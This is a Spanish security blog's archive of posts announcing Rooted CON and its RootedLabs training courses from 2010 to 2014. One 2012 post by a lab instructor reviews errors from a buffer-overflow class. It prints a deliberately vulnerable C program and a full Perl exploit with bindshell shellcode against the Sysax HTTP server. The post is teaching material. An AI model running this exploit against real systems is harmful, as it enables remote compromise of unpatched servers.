Mostrando entradas con la etiqueta rootedlabs. Mostrar todas las entradas
Mostrando entradas con la etiqueta rootedlabs. Mostrar todas las entradas

04 marzo 2014

La semana Rooted CON


Ya ha empezado la semana de Rooted CON, celebrando el quinto aniversario del congreso y que congregará a más de mil personas en el Hotel Auditorium de Madrid. Desde ayer lunes, dieron comienzo las formaciones RootedLabs, en las cuales ayer los asistentes ya disfrutaron de las sesiones sobre Inteligencia Digital de la mano de Vicente Diaz y Daniel Creus, así como todo lo que se necesita saber sobre intrusión en redes inalámbricas gracias al gran Raúl Siles

Hoy martes le toca el turno a Juan Garrido "Silverhack", Pablo González de Flu-Project y la primera sesión del lab de nuestro compañero Alex sobre ethical hacking con Kali. Mañana miércoles, finalizan los RootedLabs con una nueva sesión de Ethical Hacking con Kali, Chema y Pentesting con FOCA PRO, y el debut del gran Dabo con un repaso a todo lo que concierne a la seguridad y optimización en entornos GLAMP

También mañana miércoles, comenzará el Bootcamp de Corelan (cuyo equipo también celebra su quinto aniversario) sobre exploiting avanzado, primicia para esta edición en la que Peter Van Eeckhoutte dará una clase magistral durante dos días casi ininterrumpidos (según él mismo, con pequeños descansos para comer, pero con una estimación de entre 12 y 15 horas al día).


Y como siempre, los días 6, 7 y 8 (Jueves Viernes y Sábado) se celebrará la quinta edición de Rooted CON, de la que ya disponemos de la agenda con ponentes y ponencias definitiva (salvo cambios de ultimísima hora como el ocurrido ayer en el día 3), quedando de la siguiente manera:


Se cuenta con participación internacional (para los que tengan problemas con el inglés, habrá traducción simultánea) como Jeremy Brown, integrante del MVR de Microsoft, Juan Vázquez de Metasploit junto con Julián Vilas, Raj Shah de Palo Alto (antes de Morta Security) y muchísimos más que podrás encontrar en el listado de ponencias y ponentes.

Este año únicamente habrá un RootedPanel, cuyo título ha sido anunciado como Colaboración público-privada en la ciberdefensa nacional: el papel de la comunidad hacker, el cual será moderado por Luis Fernández y José de la Peña de la Revista SIC, y contará con los siguientes integrantes de lujo:

  • Miguel Ángel Abad: Jefe del Servicio de Ciberseguridad del Centro Nacional para la Protección de Infraestructuras Críticas, CNPIC. Secretaría de Estado de Seguridad. Ministerio del Interior. 
  • Jorge Dávila: Director del Laboratorio de Criptografía de la UPM y Director de I+D de EnCifra. 
  • Javier Candau: Jefe del Área de Ciberseguridad del Centro Criptológico Nacional, CCN. CNI. 
  • Néstor Ganuza: Teniente Coronel. Mando Conjunto de Ciberdefensa. MCCD. Ministerio de Defensa. 
  • Jaime Sánchez: investigador y desarrollador de herramientas TIC.  (@segofensiva)
  • Román Ramírez: cofundador de RootedCON. (@patowc)
Security By Default estará por allí, por lo que ¡Nos vemos en Rooted CON!
Leer más...

21 febrero 2014

Formación en Rooted CON - RootedLabs 2014

El mes pasado anunciábamos que se acercaba la RootedCON otro año más, y con el, los RootedLabs, talleres prácticos e intensivos (8 horas) en los que los asistentes aprenderán distintas especialidades de seguridad.

Desde entonces las plazas han empezado a volar y se han anunciado tres nuevos cursos: Rlab36 - Técnicas de ataque sobre clientes Wi-Fi de  Raúl Siles, Rlab 37 - Pentesting con FOCA de Chema Alonso y tras completarse el mío propio, se ha duplicado con una nueva sesión: Rlab33 Iniciación al Ethical Hacking con Kali, en el que como todos los años, introduciré interesantes cambios


Esta es la lista de los cursos que hay ahora mismo disponibles, los profesores y y las plazas disponibles hasta el momento. 

Lunes, 3 de Marzo
Rlab30 Reversing de aplicaciones y análisis forense en Android impartido por Luis Delgado [7]
Rlab35 Inteligencia Digital impartido por Dani Creus y Vicente Díaz   [7]
Rlab36 Técnicas de ataque sobre clientes Wi-Fi impartido por Raúl Siles [5]

Martes, 4 de Marzo
Rlab31 Metasploit para Pentesters impartido por Pablo González [6]
Rlab32 Auditoría y fortificación de infraestructuras  de Juan Garrido (Silverhack) COMPLETO
Rlab33 Iniciación al Ethical Hacking con Kali impartido por Alejandro Ramos [7]

Miércoles, 5 de Marzo
Rlab33 Iniciación al Ethical Hacking con Kali impartido Alejandro Ramos  COMPLETO
Rlab34 Seguridad y optimización en servidores GLAMP impartido por David Hernandez (dabo) [4]
Rlab37 Pentesting con FOCA impartido por Chema Alonso [6]

Tienes más información detallada sobre la localización y horarios en la sección RootedLabs dentro de la página de RootedCON.

Para mi es una alegría que después de 4 años consecutivos con este lab y más de 90 alumnos distintos, aún despierte interés el curso y algunos alumnos me comenten que están allí porque se lo han recomendado. ¡Gracias! 

Allí nos vemos \m/ 
Leer más...

25 enero 2014

Primeros ponentes y acciones formativas de Rooted CON 2014


Dentro de un mes y una semana aproximadamente dará comienzo la quinta edición de Rooted CON 2014,  que tendrá lugar los días 6, 7 y 8 de Marzo en el Centro de Congresos Principe Felipe del Hotel Auditorium de Madrid.

Este año como novedad habrá dos tipos de acciones formativas. En primer lugar, los RootedLabs, que se celebran como cada año los tres días antes del congreso en diferentes localizaciones de Madrid, y de los que su registro comenzó esta misma semana:



Y como novedad, el día 5 y 6 de Marzo tendrá lugar la Corelan Bootcamp, un training intensivo de más de 12 horas cada día en el que Peter Van Eeckhoutte (corelanc0d3r) dará una clase magistral de explotación en Win32 que ha definido como "hardcore". Las plazas son muy limitadas y se agotaron muy rápidamente.


En cuanto al congreso, se acaban de anunciar ya los primeros ponentes y ponencias confirmadas para esta edición:

  • César Lorenzana y Javier Rodríguez – Por qué lo llaman APT´s, cuando lo que quieren decir es dinero
  • Jaime Sánchez y Pablo San Emeterio – WhatsApp, mentiras y cintas de video
  • Andrés Tarasco – Ataques dirigidos con APTs Wi-Fi
  • Youcef Bajaja y Juan Antonio Rivera – GiroAirHack:capturando radiofrecuencias con HackRF
  • Juan Vazquez y Julián Vilas – Tú a Boston Barcelona y yo a California Tejas, A patadas con mi SCADA!
  • José Luis Verdeguer y Víctor Seva – Secure Communications System
  • Borja Berástegui – Handware hacking – Si hay un ‘input’, hay peligro
  • Manu Quintans y Frank Ruiz – 50 shades of crimeware
  • Pau Oliva – Bypassing wifi pay-walls with Android
  • Aladdin Gurbanov – Magnetic Road
  • Jeremy Brown – Microsoft Vulnerability Research: How to be a finder as a vendor
  • Raul Siles – iOS: Regreso al futuro

Leer más...

27 febrero 2013

Últimas plazas para RootedLabs 2013

Falta muy poco para que comience la semana Rooted, en la que ya sabéis que Lunes, Martes y Miércoles tienen lugar las acciones formativas RootedLabs, previas al congreso


Ya se han anunciado las ubicaciones diferentes dónde se llevarán a cabo los cursos, repartiéndose entre las instalaciones de Informática64 como en la Academia Alfonso XII.


Hace días, se tuvo que duplicar el Rootedlab de Iniciación al Ethical Hacking con Backtrack impartido por nuestro compañero Alejandro Ramos debido a su alta aceptación, y que las plazas se agotaron en pocos días. Esta nueva sesión va camino de lo mismo, teniendo hasta hoy sólo 2 plazas disponibles.


Los cursos que hay ahora mismo son:
Tienes más información detallada sobre los plazas disponibles de cada uno de ellos en la sección RootedLabs dentro de la página de RootedCON. 

Ya sabes, si quieres estar un día entero recibiendo una master-class de los mejores y de temas como reversing, hacking web, pentesting, forense en móviles y mucho más, aprovecha y reserva tu plaza cuanto antes, ¡queda muy poco para que se cierre el registro!


Leer más...

21 enero 2013

Rooted CON 2013 y RootedLabs


Quedan apenas semanas para que asistamos a la ya cuarta edición de uno de los congresos de seguridad más multitudinarios de España: Rooted CON. Como ya os comentamos cuando se inició el proceso de solicitud de ponencias / call-for-papers, esta vez tendrá lugar el 7, 8 y 9 de Marzo en la Fundación Mútua Madrileña de Madrid, como en las últimas dos ediciones.

Rooted CON 2012 Día 1


La semana pasada se anunciaron, entre otras cosas, los primeros ponentes confirmados, que son los siguientes:

- Nuestro compañero Alejandro Ramos
- Jose Miguel Esparza "eternaltodo" y Mikel Gastesi
- Jesús Olmos "sha0"
- José Pico, David Pérez y Raúl Siles - los chicos de Taddong
- Sebastián Guerrero "0xroot" y Christian López "phr0nak"
- Los hermanos Tarasco: Andrés y Miguel

Todavía quedan muchos ponentes por confirmar, pero ¡ya la cosa promete! Para este primer tramo, se ha tenido que activar la lista de espera en el proceso de registro, por haber llegado al límete de usuarios pre-registrados.



Hasta el próximo 31 de Enero no se liberarán más plazas, ya que es el último día en el que se confirmarán los pagos de este primer tramo.

Ayer domingo también conocimos más datos acerca de los RootedLabs para este año, en el que ya se han anunciado los siguientes cursos:


Cartel de lujo para estas acciones formativas que tendrán lugar los 3 días antes del congreso, ¡reserva tu plaza cuanto antes!

Leer más...

10 marzo 2012

Dos fallos tontos en el rootedlab

En uno de los RootedLab de este año explicaba como explotar dos buffer overflows muy básicos. El primer ejercicio y más clásico, desbordando una aplicación de Linux que espera un argumento. El segundo, en un parámetro de un POST un servicio HTTP de Windows.

En ambos tras siete horas de clase (aunque no hay excusa que valga) metí la pata.

El código usado para Linux no puede ser más típico:

#include 
#include 
#include 
int bof(char *string) {
  char buffer[1024];
  strcpy(buffer, string);
  return 1;
}
int main(int argc, char *argv[]) {
 if (argv[1]) {
  bof(argv[1]);
  printf("Done..\n");
 } 
return 1;
}

Compilado y ejecutado en un entorno ideal, es decir, deshabilitando el "stack-protector" y "FORTIFY_SOURCE", además de deshabilitando el "randomize_va_space del kernel".

Cuando en la clase tratamos de explotarlo por línea de comandos la shellcode generada usando msfpayload estaba mal copiada y yo había duplicado una de las líneas. Como es lógico fallaba en su ejecución y no me di cuenta del descuido, pensando que estaba fallando por utilizar un puerto ya en uso en la bindshell que lanzaba.

En el caso del exploit para Windows, ejecutado sobre una máquina virtual con XP SP2 en Inglés y sin DEP, ocurrió exactamente lo mismo, solo que copie y pegué un la shellcode en formato python en un script en perl. ¡Si os reís os buscaré y encontraré!. Por alguna extraña razón, perl no añade strings con el símbolo + y claro, aquello no iba... aunque todo lo demás estaba correcto.

La aplicación objetivo era un "multi" servidor llamado Sysax, para el que acaban de publicar otra vulnerabilidad en el servicio SSH. Una auténtica joya para empezar.

El exploit correcto a desarrollar, quedaba así:

#!/usr/bin/perl
use strict;
use IO::Socket;
my $remote = IO::Socket::INET->new(
Proto    => "tcp",
PeerAddr => "192.168.135.139",
PeerPort => "81") or die "error";
$|=1;
my $sid=$ARGV[0];
my $junk = "A"x705;
my $ret .= "\xbc\x41\xdb\x77"; # jmp esp de USER32.dll 0x77db41bc
my $nops .= "\x90"x50;

my $buf =
"\xdb\xd6\xd9\x74\x24\xf4\x5a\xbb\xb2\xea\xbb\xa1\x29\xc9" .
"\xb1\x56\x83\xc2\x04\x31\x5a\x14\x03\x5a\xa6\x08\x4e\x5d" .
"\x2e\x45\xb1\x9e\xae\x36\x3b\x7b\x9f\x64\x5f\x0f\x8d\xb8" .
"\x2b\x5d\x3d\x32\x79\x76\xb6\x36\x56\x79\x7f\xfc\x80\xb4" .
"\x80\x30\x0d\x1a\x42\x52\xf1\x61\x96\xb4\xc8\xa9\xeb\xb5" .
"\x0d\xd7\x03\xe7\xc6\x93\xb1\x18\x62\xe1\x09\x18\xa4\x6d" .
"\x31\x62\xc1\xb2\xc5\xd8\xc8\xe2\x75\x56\x82\x1a\xfe\x30" .
"\x33\x1a\xd3\x22\x0f\x55\x58\x90\xfb\x64\x88\xe8\x04\x57" .
"\xf4\xa7\x3a\x57\xf9\xb6\x7b\x50\xe1\xcc\x77\xa2\x9c\xd6" .
"\x43\xd8\x7a\x52\x56\x7a\x09\xc4\xb2\x7a\xde\x93\x31\x70" .
"\xab\xd0\x1e\x95\x2a\x34\x15\xa1\xa7\xbb\xfa\x23\xf3\x9f" .
"\xde\x68\xa0\xbe\x47\xd5\x07\xbe\x98\xb1\xf8\x1a\xd2\x50" .
"\xed\x1d\xb9\x3c\xc2\x13\x42\xbd\x4c\x23\x31\x8f\xd3\x9f" .
"\xdd\xa3\x9c\x39\x19\xc3\xb7\xfe\xb5\x3a\x37\xff\x9c\xf8" .
"\x63\xaf\xb6\x29\x0b\x24\x47\xd5\xde\xeb\x17\x79\xb0\x4b" .
"\xc8\x39\x60\x24\x02\xb6\x5f\x54\x2d\x1c\xd6\x52\xe3\x44" .
"\xbb\x34\x06\x7b\x2a\x99\x8f\x9d\x26\x31\xc6\x36\xde\xf3" .
"\x3d\x8f\x79\x0b\x14\xa3\xd2\x9b\x20\xad\xe4\xa4\xb0\xfb" .
"\x47\x08\x18\x6c\x13\x42\x9d\x8d\x24\x4f\xb5\xc4\x1d\x18" .
"\x4f\xb9\xec\xb8\x50\x90\x86\x59\xc2\x7f\x56\x17\xff\xd7" .
"\x01\x70\x31\x2e\xc7\x6c\x68\x98\xf5\x6c\xec\xe3\xbd\xaa" .
"\xcd\xea\x3c\x3e\x69\xc9\x2e\x86\x72\x55\x1a\x56\x25\x03" .
"\xf4\x10\x9f\xe5\xae\xca\x4c\xac\x26\x8a\xbe\x6f\x30\x93" .
"\xea\x19\xdc\x22\x43\x5c\xe3\x8b\x03\x68\x9c\xf1\xb3\x97" .
"\x77\xb2\xc4\xdd\xd5\x93\x4c\xb8\x8c\xa1\x10\x3b\x7b\xe5" .
"\x2c\xb8\x89\x96\xca\xa0\xf8\x93\x97\x66\x11\xee\x88\x02" .
"\x15\x5d\xa8\x06";


my $junk2 .= "\x44"x1000;
my $payload = $junk . $ret . $nops . $buf . $junk2;
my $head =
"POST /scgi?sid=$sid&pid=mk_folder2_name1.htm HTTP/1.1\r\n"
."Host: \r\n"
."Referer: http://192.168.139.135/scgi?sid=".$sid."&pid=mk_folder1_name1.htm\r\n"
."Content-Type: multipart/form-data; boundary=---------------------------"
."1190753071675116720811342231\r\n"
."Content-Length: 171\r\n\r\n"
."-----------------------------1190753071675116720811342231\r\n"
."Content-Disposition: form-data; name=\"e2\"\r\n\r\n"
."$payload\r\n"
."-----------------------------1190753071675116720811342231--\r\n\r\n"
."\r\n";
print $head;
print $remote $head;
while(<$remote>) { print }
close $remote;


Por desgracia el temario siempre es demasiado largo y no había mucho tiempo ni para meter un par de prints o ver que decía exactamente el debugger y arreglar el problema. Nota mental para próximos años, si es que los hay: ¡reducir contenido o hacerlo de dos días!

Leer más...

07 diciembre 2011

RootedLabs 2012


Al igual que el año pasado por estas fechas, tras el anuncio del comienzo de RootedCON 2012, nos llega también información acerca de RootedLabs, acciones formativas que tienen lugar los tres días previos al congreso (27, 28 y 29 de Febrero de 2012) en Madrid, en la que un conjunto de profesionales dan una clase magistral, de 8 horas de duración, sobre temas como ingeniería inversa en diferentes niveles de dificultad, pentesting, seguridad en aplicaciones web, comunicaciones móviles, forense, y un largo etc.

Se ha publicado el primer conjunto de profesores y sus respectivos labs:


Dentro de cada ficha de cada uno de los labs, tendréis más información acerca de requisitos necesarios para la asistencia, temario que se ofrece, breve descripción del curso e información del profesor. El precio sigue siendo el mismo de anteriores ediciones, 200€ + IVA, y podréis registraros siguiendo las indicaciones que aparecen en este enlace. No dudéis y reservad vuestro sitio cuanto antes, ¡las plazas vuelan! Si bien es posible que se abran nuevos slots para algún lab en concreto, os recomendamos encarecidamente realizar el registro en el lab que estéis interesados tan pronto os sea posible.

Leer más...

22 febrero 2011

Últimas plazas para RootedLabs 2011


Estamos a apenas 6 días de adentrarnos en la semana Rooted, y desde la organización nos llega esta información sobre las últimas plazas disponibles (apenas 10) para los RootedLabs de este año, que pasamos a adjuntar a continuación:

-----------------------------------

Últimas plazas disponibles a falta de una semana

No deberías dejar de aprovechar esta oportunidad! Estás a tiempo de formar parte de unos cursos de formación de un día de duración, con unos profesores de excepción, y aprender con el mejor ambiente posible. 

En una semana darán comienzo las RootedLabs 2011, y el apoyo ha sido increíble: Más de 120 asistentes asistirán a clases magistrales sobre ingeniería inversa, informática forense, seguridad en web y redes, además de en tecnologías móviles, con profesionales de la talla de Joxean Koret, Pedro Sánchez, Chema Alonso, Alejandro Ramos, José Selvi, David Pérez, José Picó y Raúl Siles de Taddong, Juan Luis G. Rambla y Juan Garrido.

Quedan menos de 10 plazas disponibles para alcanzar el cupo en todos los cursos, ¡date prisa!

-----------------------------------

Ya contamos con los ponentes y ponencias confirmadas para esta edición, que reunirá a casi 600 personas en pleno centro de Madrid durante los días 3, 4 y 5 de Marzo.

Os podemos adelantar que, por supuesto, Security By Default estará allí, y no sólo para cubrir el evento como ya se hizo el año pasado...

[+] RootedCON
[+] RootedLabs

Leer más...

01 diciembre 2010

RootedLabs 2011


Con la llegada de las primeras informaciones acerca de Rooted CON, no podían faltar RootedLabs.

Como ya os comentamos el año pasado, RootedLabs es un conjunto de acciones formativas/cursos de una jornada de duración, que tienen lugar la misma semana del congreso, los tres días anteriores. Para esta nueva edición, los RootedLabs se llevarán a cabo los días 28 de Febrero, 1 y 2 de Marzo de 2011, manteniendo el precio de 200€ + IVA. Estas acciones, de aproximadamente 12 plazas cada una, están orientadas a la generación de fondos para sufragar los gastos de Rooted CON, y para esta edición, se cuentan con 8 cursos con temáticas que pasamos a enumerar, junto con su profesor correspondiente:
  • Nuestro compañero Alejandro Ramos realizará el curso sobre tests de intrusión, cuyo objetivo es el de adquirir los conocimientos necesarios para la realización de tests de intrusión internos y/o externos en una organización, además de aportar conocimiento sobre las herramientas necesarias para llevar a cabo esta tarea.
  • Chema Alonso impartirá dos cursos, uno sobre técnicas de inyección en aplicaciones web y otro sobre el proceso previo al proceso de test de intrusión, el correspondiente con la recolección de información y posterior realización de un informe de inteligencia sobre una organización. Todo ello, utilizando la FOCA Pro.
  • José Selvi, de Pentester.es, impartirá el lab Metasploit para Pentesters, un curso sobre dicha herramienta con el fin de poder utilizarla para la realización de tests de intrusión, a través de sus diferentes módulos.
  • Joxean Koret, ponente de Rooted CON 2010 y miembro de la comunidad 48Bits, impartirá el lab sobre Fundamentos de Ingeniería Inversa, mediante el cual se analizará, comprenderá y extraerá la información necesaria del software para posterioremente entender su funcionamiento, realizar una reconstrucción de su código, realizar un análisis en caso de tratarse de un malware, búsqueda de vulnerabilidades, etc. Todo ello, utilizando la herramienta de Hex-Rays IDA Pro.
  • Juan Garrido "silverhack", de Informática64 y también profesor de los anteriores RootedLabs, impartirá el curso Análisis Forense de Red, en el que se introducirá al asistente en esta práctica, pudiendo obtener más información sobre transmisiones de red que hayan ocurrido, analizando que herramientas las han provocado y patrones, así como la recuperación de información y datos teniendo como base el tráfico ocasionado. A todos los asistentes se les entregará el libro “Análisis Forense Digital en entornos Windows”  
  • Juan Luis G. Rambla, de Informática64, y al que pudimos ver ayer en el DISI 2010 en la última mesa coloquio sobre infraestructuras críticas, realizará el RootedLab Ataques en redes de datos, en el cual se mostrarán técnicas aplicables a ataques de redes de datos (como pueden ser man-in-the-middle, tipos de spoofing, secuestro de sesiones....) así cómo sus correspondientes técnicas a llevar a cabo para su protección.
  • Pedro Sánchez, de ConexiónInversa, realizará el lab denominado Análisis Forense de dispositivos móviles, mediante el cual se podrá llevar a cabo una investigación sobre estos sistemas tan comunes para todos y cada uno de nosotros en nuestro día a día,  practicando sobre imágenes de teléfonos y realizando análisis sobre tarjetas SIM y de memoria.
Como podréis comprobar, se tocan todos los temas, unos en mayor profundidad que en otros, pero al fin y al cabo, varios tópicos sobre seguridad informática y diferentes campos. Si tenéis la oportunidad de asistir, ¡es algo que no podéis dejar escapar!

Por cierto, hoy comienza el proceso de registro en el congreso Rooted CON 2011 para todos, tanto asistentes como no asistentes de la pasada edición, a un precio de 60 € entrada normal y 25€ entrada de estudiante, existiendo además posibilidad de descuentos (sólo aplicables para la entrada normal) si se es asociado al ISMSForum o (ISC)2

Leer más...